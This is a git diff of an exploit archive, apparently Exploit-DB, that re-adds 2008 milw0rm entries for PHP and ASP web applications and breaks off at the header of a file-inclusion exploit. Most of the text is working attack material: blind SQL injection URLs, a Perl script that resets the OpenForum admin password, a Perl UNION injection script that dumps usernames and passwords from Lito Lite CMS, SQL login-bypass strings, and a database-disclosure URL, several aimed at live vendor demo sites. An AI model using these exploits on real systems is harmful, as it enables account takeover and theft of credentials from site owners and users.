+ [~]Tybe     : Remote Blind SQL Injection Vulnerability
+   
+ [~]Vendor   : www.activewebsoftwares.com
+   
+ [~]Software : Active Bids
+   
+ [~]author   : Mountassif Moad
+
+
+
+http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=1
+
+http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=0
+
+Demo :
+
+http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=1
+
+http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=0
+
+
+# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...
+
+# milw0rm.com [2008-11-29]
diff --git a/platforms/php/webapps/7291.pl b/platforms/php/webapps/7291.pl
index 443fa525c..7cfa5d7d0 100755
--- a/platforms/php/webapps/7291.pl
+++ b/platforms/php/webapps/7291.pl
@@ -1,156 +1,156 @@
-#!/usr/bin/perl -w
-#========================================================
-#OpenForum 0.66 Beta Remote Reset Admin Password Exploit
-#========================================================
-#
-#  ,--^----------,--------,-----,-------^--,
-#  |  |||||||||   `--------'    |	   O	  .. CWH Underground Hacking Team ..
-#  `+---------------------------^----------|
-#   `\_,-------, _________________________|
-#      / XXXXXX /`|     /
-#     / XXXXXX /  `\   /
-#    / XXXXXX /\______(
-#   / XXXXXX /           
-#  / XXXXXX /
-# (________(             
-#  `------'
-#
-#AUTHOR : CWH Underground
-#DATE : 29 November 2008
-#SITE : cwh.citec.us
-#
-#
-#####################################################
-#APPLICATION : OpenForum
-#VERSION : 0.66 Beta
-#DOWNLOAD : http://downloads.sourceforge.net/openforum/openforum066.zip
-######################################################
-#######################################################################################
-#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
-#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#######################################################################################
-
-use LWP;
-use HTTP::Request;
-use HTTP::Request::Common;
-
-print "\n==================================================\n";
-print " Openforum 0.66 beta Remote Reset Admin Password exploit \n";
-print " \n";
-print " Discovered By CWH Underground \n";
-print "==================================================\n";
-print " \n";
-print " ,--^----------,--------,-----,-------^--, \n";
-print " | ||||||||| `--------' | O \n";
-print " `+---------------------------^----------| \n";
-print " `\_,-------, _________________________| \n";
-print " / XXXXXX /`| / \n";
-print " / XXXXXX / `\ / \n";
-print " / XXXXXX /\______( \n";
-print " / XXXXXX / \n";
-print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
-print " (________( \n";
-print " `------' \n";
-print " \n";
-
-if ($#ARGV ne 2) {
-	print "Usage: ./openforum.pl <url-to-index-page> <user account> <new password>\n";
-	print "Ex. ./openforum.pl http://www.target.com/openforum/index.php admin cwhpass\n";
-	exit();
-}
-
-$url = $ARGV[0];
-$user = $ARGV[1];
-$newpass = $ARGV[2];
-
-if ($url !~ /^http:\/\//) {
-	$url = "http://".$url;
-}
-
-print "[+] Target url: ".$url."\n\n";
-
-$req = HTTP::Request->new (GET => $url);
-$req->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18');
-$req->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5');
-$req->header (Accept_Language => 'en-us,en;q=0.5');
-
-$ua = LWP::UserAgent->new;
-$response = $ua->request ($req);
-
-if ($response->code ne 200) {
-	print "Error: Could not request for index page\n";
-	exit ();
-}
-
-$header = $response->headers->as_string;
-
-($sessid) = $header =~ /sessid=(.+)\n/;
-print ":: Retreive session id ::\n";
-print "[+] ".$sessid."\n\n";
-
-$url =~ s/index\.php$/profile.php?user=$user/;
-
-#print $url;
-
-
-
-$req = HTTP::Request->new (GET => $url);
-$req->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18');
-$req->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5');
-$req->header (Accept_Language => 'en-us,en;q=0.5');
-$req->header (Cookie => 'sessid='.$sessid.'; userid='.$user);
-
-$response = $ua->request ($req);
-if ($response->code ne 200) {
-	print "Error: Could not request for ".$user."'s profile page\n";
-	exit ();
-}
-
-$content = $response->content;
-$update = "1";
-$adminaction = "";
-($email) = $content =~ /\"email\" value=\"(.*?)\"/;
-($signature) = $content =~ /\"signature\">(.*?)<\/textarea>/;
-$day = "";
-$month = "";
-$year = "";
-($website) = $content =~ /\"website\" value=\"(.*?)\"/;
-($name) = $content =~ /\"name\" value=\"(.*?)\"/;
-($phone) = $content =~ /\"phone\" value=\"(.*?)\"/;
-($city) = $content =~ /\"city\" value=\"(.*?)\"/;
-($location) = $content =~ /\"location\" value=\"(.*?)\"/;
-$sytle = "";
-$submit = "Update!";
-
-
-print ":: Update new password ::\n\n";
-$url =~ s/\?user=admin//;
-
-
-$response = $ua->request (POST $url,
-		User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18',
-		Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',
-		Accept_Language => 'en-us,en;q=0.5',
-		Cookie => 'sessid='.$sessid.'; userid='.$user,
-		Content_Type => 'form-data',
-		Content => [update => $update, user => $user, adminaction => '', email => $email, signature => $signature, website => $website, name => $name,
-				phone => $phone, city => $city, location => $location, password => $newpass, submit => $submit]
-);
-
-if ($response->code ne 200) {
-	print "Error: Could not request for profile page\n";
-	exit ();
-}
-
-$content = $response->content;
-
-if ($content =~ /<br>updated<br><table width=\"100%\">/) {
-	print "[+] Exploit Success\n";
-	print "[+] New admin's password: ".$newpass."\n";
-}
-else
-{
-	print "[+] Exploit Failed\n";
-}
-
-# milw0rm.com [2008-11-29]
+#!/usr/bin/perl -w
+#========================================================
+#OpenForum 0.66 Beta Remote Reset Admin Password Exploit
+#========================================================
+#
+#  ,--^----------,--------,-----,-------^--,
+#  |  |||||||||   `--------'    |	   O	  .. CWH Underground Hacking Team ..
+#  `+---------------------------^----------|
+#   `\_,-------, _________________________|
+#      / XXXXXX /`|     /
+#     / XXXXXX /  `\   /
+#    / XXXXXX /\______(
+#   / XXXXXX /           
+#  / XXXXXX /
+# (________(             
+#  `------'
+#
+#AUTHOR : CWH Underground
+#DATE : 29 November 2008
+#SITE : cwh.citec.us
+#
+#
+#####################################################
+#APPLICATION : OpenForum
+#VERSION : 0.66 Beta
+#DOWNLOAD : http://downloads.sourceforge.net/openforum/openforum066.zip
+######################################################
+#######################################################################################
+#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
+#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#######################################################################################
+
+use LWP;
+use HTTP::Request;
+use HTTP::Request::Common;
+
+print "\n==================================================\n";
+print " Openforum 0.66 beta Remote Reset Admin Password exploit \n";
+print " \n";
+print " Discovered By CWH Underground \n";
+print "==================================================\n";
+print " \n";
+print " ,--^----------,--------,-----,-------^--, \n";
+print " | ||||||||| `--------' | O \n";
+print " `+---------------------------^----------| \n";
+print " `\_,-------, _________________________| \n";
+print " / XXXXXX /`| / \n";
+print " / XXXXXX / `\ / \n";
+print " / XXXXXX /\______( \n";
+print " / XXXXXX / \n";
+print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
+print " (________( \n";
+print " `------' \n";
+print " \n";
+
+if ($#ARGV ne 2) {
+	print "Usage: ./openforum.pl <url-to-index-page> <user account> <new password>\n";
+	print "Ex. ./openforum.pl http://www.target.com/openforum/index.php admin cwhpass\n";
+	exit();
+}
+
+$url = $ARGV[0];
+$user = $ARGV[1];
+$newpass = $ARGV[2];
+
+if ($url !~ /^http:\/\//) {
+	$url = "http://".$url;
+}
+
+print "[+] Target url: ".$url."\n\n";
+
+$req = HTTP::Request->new (GET => $url);
+$req->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18');
+$req->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5');
+$req->header (Accept_Language => 'en-us,en;q=0.5');
+
+$ua = LWP::UserAgent->new;
+$response = $ua->request ($req);
+
+if ($response->code ne 200) {
+	print "Error: Could not request for index page\n";
+	exit ();
+}
+
+$header = $response->headers->as_string;
+
+($sessid) = $header =~ /sessid=(.+)\n/;
+print ":: Retreive session id ::\n";
+print "[+] ".$sessid."\n\n";
+
+$url =~ s/index\.php$/profile.php?user=$user/;
+
+#print $url;
+
+
+
+$req = HTTP::Request->new (GET => $url);
+$req->header (User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18');
+$req->header (Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5');
+$req->header (Accept_Language => 'en-us,en;q=0.5');
+$req->header (Cookie => 'sessid='.$sessid.'; userid='.$user);
+
+$response = $ua->request ($req);
+if ($response->code ne 200) {
+	print "Error: Could not request for ".$user."'s profile page\n";
+	exit ();
+}
+
+$content = $response->content;
+$update = "1";
+$adminaction = "";
+($email) = $content =~ /\"email\" value=\"(.*?)\"/;
+($signature) = $content =~ /\"signature\">(.*?)<\/textarea>/;
+$day = "";
+$month = "";
+$year = "";
+($website) = $content =~ /\"website\" value=\"(.*?)\"/;
+($name) = $content =~ /\"name\" value=\"(.*?)\"/;
+($phone) = $content =~ /\"phone\" value=\"(.*?)\"/;
+($city) = $content =~ /\"city\" value=\"(.*?)\"/;
+($location) = $content =~ /\"location\" value=\"(.*?)\"/;
+$sytle = "";
+$submit = "Update!";
+
+
+print ":: Update new password ::\n\n";
+$url =~ s/\?user=admin//;
+
+
+$response = $ua->request (POST $url,
+		User_Agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18',
+		Accept => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',
+		Accept_Language => 'en-us,en;q=0.5',
+		Cookie => 'sessid='.$sessid.'; userid='.$user,
+		Content_Type => 'form-data',
+		Content => [update => $update, user => $user, adminaction => '', email => $email, signature => $signature, website => $website, name => $name,
+				phone => $phone, city => $city, location => $location, password => $newpass, submit => $submit]
+);
+
+if ($response->code ne 200) {
+	print "Error: Could not request for profile page\n";
+	exit ();
+}
+
+$content = $response->content;
+
+if ($content =~ /<br>updated<br><table width=\"100%\">/) {
+	print "[+] Exploit Success\n";
+	print "[+] New admin's password: ".$newpass."\n";
+}
+else
+{
+	print "[+] Exploit Failed\n";
+}
+
+# milw0rm.com [2008-11-29]
diff --git a/platforms/php/webapps/7294.pl b/platforms/php/webapps/7294.pl
index 17bd0167a..75e741fe5 100755
--- a/platforms/php/webapps/7294.pl
+++ b/platforms/php/webapps/7294.pl
@@ -1,92 +1,92 @@
-#!/usr/bin/perl -w
-#===========================================================
-# Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit
-#===========================================================
-#
-#  ,--^----------,--------,-----,-------^--,
-#  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-#  `+---------------------------^----------|
-#    `\_,-------, _________________________|
-#      / XXXXXX /`|     /
-#     / XXXXXX /  `\   /
-#    / XXXXXX /\______(
-#   / XXXXXX /           
-#  / XXXXXX /
-# (________(             
-#  `------'
-#
-#AUTHOR : CWH Underground
-#DATE : 29 November 2008
-#SITE : cwh.citec.us
-#
-#
-#####################################################
-#APPLICATION : Lito Lite CMS
-#DOWNLOAD    : http://www.lovedesigner.net/files/download/lito_lite.zip
-######################################################
-#
-#Note: magic_quotes_gpc = off
-#
-#######################################################################################
-#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
-#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#######################################################################################
-
-
-use LWP::UserAgent;
-use HTTP::Request;
-
-if ($#ARGV+1 != 2)
-{
-   print "\n==============================================\n";
-   print "    Lito Lite Remote SQL Injection Exploit   \n";
-   print "                                              \n";
-   print "        Discovered By CWH Underground         \n";
-   print "==============================================\n";
-   print "                                              \n";
-   print "  ,--^----------,--------,-----,-------^--,   \n";
-   print "  | |||||||||   `--------'     |          O	\n";
-   print "  `+---------------------------^----------|   \n";
-   print "    `\_,-------, _________________________|   \n";
-   print "      / XXXXXX /`|     /                      \n";
-   print "     / XXXXXX /  `\   /                       \n";
-   print "    / XXXXXX /\______(                        \n";
-   print "   / XXXXXX /                                 \n";
-   print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
-   print " (________(                                   \n";
-   print "  `------'                                    \n";
-   print "                                              \n"; 
-   print "Usage  : ./xpl.pl <Target> <Data Limit>\n";
-   print "Example: ./xpl.pl http://www.target.com/lito_lite 10\n";
-   exit();
-}
-
-$target  = ($ARGV[0] =~ /^http:\/\//) ?  $ARGV[0]:  'http://' . $ARGV[0];
-$number = $ARGV[1];
-
-print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
-print "\n  ..:: SQL Injection Exploit By CWH Underground ::.. ";
-print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
-print "\n[+]Dump Username and Password\n";
-
-for ($start=0;$start<$number;$start++) {
-
-$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$req = HTTP::Request->new(GET => $target."/cate.php?cid=1%27%20and%201=2%20union%20select 1,2,3,concat(0x3a3a3a,username,0x3a3a,password,0x3a3a3a),5,6,7,8,9,10%20from%20mx_user%20limit%201%20offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!\n";
-$res = $xpl->request($req);
-$info = $res->content;
-$count=$start+1;
-
-if ($info =~ /:::(.+):::/)
-{
-$dump=$1;
-($username,$password)= split('::',$dump);
-printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
-}
-else { 
-	print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";
-	exit;
-}
-}
-
-# milw0rm.com [2008-11-29]
+#!/usr/bin/perl -w
+#===========================================================
+# Lito Lite CMS (cate.php cid) Remote SQL Injection Exploit
+#===========================================================
+#
+#  ,--^----------,--------,-----,-------^--,
+#  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+#  `+---------------------------^----------|
+#    `\_,-------, _________________________|
+#      / XXXXXX /`|     /
+#     / XXXXXX /  `\   /
+#    / XXXXXX /\______(
+#   / XXXXXX /           
+#  / XXXXXX /
+# (________(             
+#  `------'
+#
+#AUTHOR : CWH Underground
+#DATE : 29 November 2008
+#SITE : cwh.citec.us
+#
+#
+#####################################################
+#APPLICATION : Lito Lite CMS
+#DOWNLOAD    : http://www.lovedesigner.net/files/download/lito_lite.zip
+######################################################
+#
+#Note: magic_quotes_gpc = off
+#
+#######################################################################################
+#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
+#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#######################################################################################
+
+
+use LWP::UserAgent;
+use HTTP::Request;
+
+if ($#ARGV+1 != 2)
+{
+   print "\n==============================================\n";
+   print "    Lito Lite Remote SQL Injection Exploit   \n";
+   print "                                              \n";
+   print "        Discovered By CWH Underground         \n";
+   print "==============================================\n";
+   print "                                              \n";
+   print "  ,--^----------,--------,-----,-------^--,   \n";
+   print "  | |||||||||   `--------'     |          O	\n";
+   print "  `+---------------------------^----------|   \n";
+   print "    `\_,-------, _________________________|   \n";
+   print "      / XXXXXX /`|     /                      \n";
+   print "     / XXXXXX /  `\   /                       \n";
+   print "    / XXXXXX /\______(                        \n";
+   print "   / XXXXXX /                                 \n";
+   print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
+   print " (________(                                   \n";
+   print "  `------'                                    \n";
+   print "                                              \n"; 
+   print "Usage  : ./xpl.pl <Target> <Data Limit>\n";
+   print "Example: ./xpl.pl http://www.target.com/lito_lite 10\n";
+   exit();
+}
+
+$target  = ($ARGV[0] =~ /^http:\/\//) ?  $ARGV[0]:  'http://' . $ARGV[0];
+$number = $ARGV[1];
+
+print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
+print "\n  ..:: SQL Injection Exploit By CWH Underground ::.. ";
+print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
+print "\n[+]Dump Username and Password\n";
+
+for ($start=0;$start<$number;$start++) {
+
+$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$req = HTTP::Request->new(GET => $target."/cate.php?cid=1%27%20and%201=2%20union%20select 1,2,3,concat(0x3a3a3a,username,0x3a3a,password,0x3a3a3a),5,6,7,8,9,10%20from%20mx_user%20limit%201%20offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!\n";
+$res = $xpl->request($req);
+$info = $res->content;
+$count=$start+1;
+
+if ($info =~ /:::(.+):::/)
+{
+$dump=$1;
+($username,$password)= split('::',$dump);
+printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
+}
+else { 
+	print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";
+	exit;
+}
+}
+
+# milw0rm.com [2008-11-29]
diff --git a/platforms/php/webapps/7299.txt b/platforms/php/webapps/7299.txt
index 0cbd3af0e..b54697c4a 100755
--- a/platforms/php/webapps/7299.txt
+++ b/platforms/php/webapps/7299.txt
@@ -1,42 +1,42 @@
-[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
- [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
-   
- [~]Vendor:www.activewebsoftwares.com
-   
- [~]Software: Active Photo Gallery v 6.2
-   
- [~]author: ((я3d D3v!L))
-   
- [~] Date: 28.11.2008
-   
- [~] Home: www.ahacker.biz
-   
- [~] contact: N/A
-
-[~] -----------------------------{str0ke}------------------------------
-   
-   
- [~] Exploit:
-   
-  username: r0' or ' 1=1--
-  password: r0' or ' 1=1--
-   
-   
- [~]login 4 d3m0:
-   
-  http://www.activewebsoftwares.com/demoactivephotogallery/account.asp
- 
- [~]-----------------------------{str0ke}---------------------------------------------------
- 
-  [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
-  [~]
-  [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
-  [~]
-  [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
-  [~]
-  [~] xp10.biz & ahacker.biz
-  [~]
- 
- [~]--------------------------------------------------------------------------------
-
-# milw0rm.com [2008-11-30]
+[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
+ [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
+   
+ [~]Vendor:www.activewebsoftwares.com
+   
+ [~]Software: Active Photo Gallery v 6.2
+   
+ [~]author: ((я3d D3v!L))
+   
+ [~] Date: 28.11.2008
+   
+ [~] Home: www.ahacker.biz
+   
+ [~] contact: N/A
+
+[~] -----------------------------{str0ke}------------------------------
+   
+   
+ [~] Exploit:
+   
+  username: r0' or ' 1=1--
+  password: r0' or ' 1=1--
+   
+   
+ [~]login 4 d3m0:
+   
+  http://www.activewebsoftwares.com/demoactivephotogallery/account.asp
+ 
+ [~]-----------------------------{str0ke}---------------------------------------------------
+ 
+  [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
+  [~]
+  [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
+  [~]
+  [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
+  [~]
+  [~] xp10.biz & ahacker.biz
+  [~]
+ 
+ [~]--------------------------------------------------------------------------------
+
+# milw0rm.com [2008-11-30]
diff --git a/platforms/php/webapps/7301.txt b/platforms/php/webapps/7301.txt
index 919a2fcd7..85c3b7866 100755
--- a/platforms/php/webapps/7301.txt
+++ b/platforms/php/webapps/7301.txt
@@ -1,40 +1,40 @@
-###########################################################################
-#-----------------------------OffensiveTrack------------------------------#
-###########################################################################
-
-
-
-
-
-
-
-#found by : OffensiveTrack
-#Author : AlpHaNiX
-#website : www.offensivetrack.org
-#contact on mail & msn : AlpHa@Hacker.bz
-
-
-
-
-
-###########################################################################
-
-
-
-
-#script : Active timebilling
-#€xploit : http://www.activewebsoftwares.com/demoactivetimebilling/Account.asp
-
-
-  username: r0' or ' 1=1--
-  password: r0' or ' 1=1--
-
-
-
-
-
-#greetz : My Best Friend Zigma
-
-###########################################################################
-
-# milw0rm.com [2008-11-30]
+###########################################################################
+#-----------------------------OffensiveTrack------------------------------#
+###########################################################################
+
+
+
+
+
+
+
+#found by : OffensiveTrack
+#Author : AlpHaNiX
+#website : www.offensivetrack.org
+#contact on mail & msn : AlpHa@Hacker.bz
+
+
+
+
+
+###########################################################################
+
+
+
+
+#script : Active timebilling
+#€xploit : http://www.activewebsoftwares.com/demoactivetimebilling/Account.asp
+
+
+  username: r0' or ' 1=1--
+  password: r0' or ' 1=1--
+
+
+
+
+
+#greetz : My Best Friend Zigma
+
+###########################################################################
+
+# milw0rm.com [2008-11-30]
diff --git a/platforms/php/webapps/7303.txt b/platforms/php/webapps/7303.txt
index 97e2ad28f..126a4e8bb 100755
--- a/platforms/php/webapps/7303.txt
+++ b/platforms/php/webapps/7303.txt
@@ -1,61 +1,61 @@
-***********************************************************************************************************************************************************        
-[!]                                                                                                                                                     [!]
-[!]                                  OOOO             O                                 OOOOOOOOO                                                       [!]
-[!]                                 O    O            O                                 O      O                                                        [!]
-[!]                                 O                 O                                       O                                                         [!]
-[!]                                 O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO                               [!]
-[!]                                 O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O                              [!]
-[!]                                 O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO                              [!]
-[!]                                 O    O    OOOO    O     O   O         O               O      O O    O   O   O   O                                   [!]
-[!]                                  OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO                               [!]
-[!]                                           OO                                                                                                        [!]
-[!]                                          OO                                                                                                         [!]
-[!]                                         OO                          Proud To Be MoroCCaN                                                            [!]
-[!]                                        OO                    WwW.Exploiter5.CoM ; No-ExploiT.CoM ; WwW.IQ-TY.CoM                                    [!]
-***********************************************************************************************************************************************************
-+----                                                        Bismi Allah Irahmani ArraHim                                                             ----+
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++                             [ Quick Tree View .NET v 3.1 (qtv.mdb) Remote Database Disclosure Vulnerability ]                                         ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-:   Author   : Cyber-Zone   ( Abdelkhalek )                                                               :       :                                       :
-¦   E-MaiL   : Paradis_des_fous[at]hotmail[dot]fr                                                         ¦       ¦                                       ¦
-¦   Home     : WwW.IQ-Ty.CoM                                                                              ¦       ¦         MySQL Version Is :            ¦
-¦   From     : Mor0ccan nightamres                                                                        ¦       ¦                                       ¦
-¦   Script   : http://activewebsoftwares.com                                                              ¦       ¦                ![ ]!                  ¦
-¦   Download : http://activewebsoftwares.com/P22_QuickTreeView.NET.aspx?Tabopen=                          ¦       ¦                                       ¦
-¦   RisK     : High [¦¦¦¦¦¦¦¦]                                                                            ¦       ¦                                       ¦
-¦ --------------------------------------------------------------------------------------------------------+       +-------------------------------------- ¦
-¦                                                          From The Dark Side Of MoroCCo                                                                 ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-:                                                                                                                                                         :
-¦  Remember    :                                                                                                                                          ¦
-¦  -------------                                                                                                                                          ¦
-¦                                                                                                                                                         ¦
-¦  This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages.                                             ¦
-¦                                                                                                                                                         ¦
-
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++        [!]  Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an  [!]            ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-
-http://localhost/script/data/qtv.mdb
-
-Live demo
-
-http://www.activewebsoftwares.com/democomponents/qtvdotnet/data/qtv.mdb
-
-Nayda Dima Nayda
-Mgharba
-
-
-
-
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-+----                                                                  ThanX To                                                                       ----+
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++[  $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-=                                                                    [AttaCk Is CompLet]                                                                  =
-___________________________________________________________________________________________________________________________________________________________
-
-# milw0rm.com [2008-11-30]
+***********************************************************************************************************************************************************        
+[!]                                                                                                                                                     [!]
+[!]                                  OOOO             O                                 OOOOOOOOO                                                       [!]
+[!]                                 O    O            O                                 O      O                                                        [!]
+[!]                                 O                 O                                       O                                                         [!]
+[!]                                 O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO                               [!]
+[!]                                 O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O                              [!]
+[!]                                 O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO                              [!]
+[!]                                 O    O    OOOO    O     O   O         O               O      O O    O   O   O   O                                   [!]
+[!]                                  OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO                               [!]
+[!]                                           OO                                                                                                        [!]
+[!]                                          OO                                                                                                         [!]
+[!]                                         OO                          Proud To Be MoroCCaN                                                            [!]
+[!]                                        OO                    WwW.Exploiter5.CoM ; No-ExploiT.CoM ; WwW.IQ-TY.CoM                                    [!]
+***********************************************************************************************************************************************************
++----                                                        Bismi Allah Irahmani ArraHim                                                             ----+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++                             [ Quick Tree View .NET v 3.1 (qtv.mdb) Remote Database Disclosure Vulnerability ]                                         ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+:   Author   : Cyber-Zone   ( Abdelkhalek )                                                               :       :                                       :
+¦   E-MaiL   : Paradis_des_fous[at]hotmail[dot]fr                                                         ¦       ¦                                       ¦
+¦   Home     : WwW.IQ-Ty.CoM                                                                              ¦       ¦         MySQL Version Is :            ¦
+¦   From     : Mor0ccan nightamres                                                                        ¦       ¦                                       ¦
+¦   Script   : http://activewebsoftwares.com                                                              ¦       ¦                ![ ]!                  ¦
+¦   Download : http://activewebsoftwares.com/P22_QuickTreeView.NET.aspx?Tabopen=                          ¦       ¦                                       ¦
+¦   RisK     : High [¦¦¦¦¦¦¦¦]                                                                            ¦       ¦                                       ¦
+¦ --------------------------------------------------------------------------------------------------------+       +-------------------------------------- ¦
+¦                                                          From The Dark Side Of MoroCCo                                                                 ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+:                                                                                                                                                         :
+¦  Remember    :                                                                                                                                          ¦
+¦  -------------                                                                                                                                          ¦
+¦                                                                                                                                                         ¦
+¦  This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages.                                             ¦
+¦                                                                                                                                                         ¦
+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++        [!]  Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an  [!]            ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+
+http://localhost/script/data/qtv.mdb
+
+Live demo
+
+http://www.activewebsoftwares.com/democomponents/qtvdotnet/data/qtv.mdb
+
+Nayda Dima Nayda
+Mgharba
+
+
+
+
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
++----                                                                  ThanX To                                                                       ----+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++[  $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+=                                                                    [AttaCk Is CompLet]                                                                  =
+___________________________________________________________________________________________________________________________________________________________
+
+# milw0rm.com [2008-11-30]
diff --git a/platforms/php/webapps/7304.pl b/platforms/php/webapps/7304.pl
index 2ba21f41f..2a8796b1a 100755
--- a/platforms/php/webapps/7304.pl
+++ b/platforms/php/webapps/7304.pl
@@ -1,164 +1,164 @@
-#!/usr/bin/perl -w
-#======================================
-# KTPCCD Local File Inclusion Exploit
-#======================================
-#
-#  ,--^----------,--------,-----,-------^--,
-#  |  |||||||||   `--------'    |	   O	  .. CWH Underground Hacking Team ..
-#  `+---------------------------^----------|
-#   `\_,-------, _________________________|
-#      / XXXXXX /`|     /
-#     / XXXXXX /  `\   /
-#    / XXXXXX /\______(
-#   / XXXXXX /           
-#  / XXXXXX /
-# (________(             
-#  `------'
-#
-#AUTHOR : CWH Underground
-#DATE : 30 November 2008
-#SITE : cwh.citec.us
-#
-#
-#####################################################
-#APPLICATION : KTP Computer Customer Database CMS
-#VERSION : 1
-#DOWNLOAD : http://downloads.sourceforge.net/ktpcomputercust/ktp_build_20081119.zip
-######################################################
-#Note: magic_quotes_gpc = off
-#Vulnerability in Local File Inclusion
-#Wrote Exploit for Local File Inclusion <-> Remote Command Execution
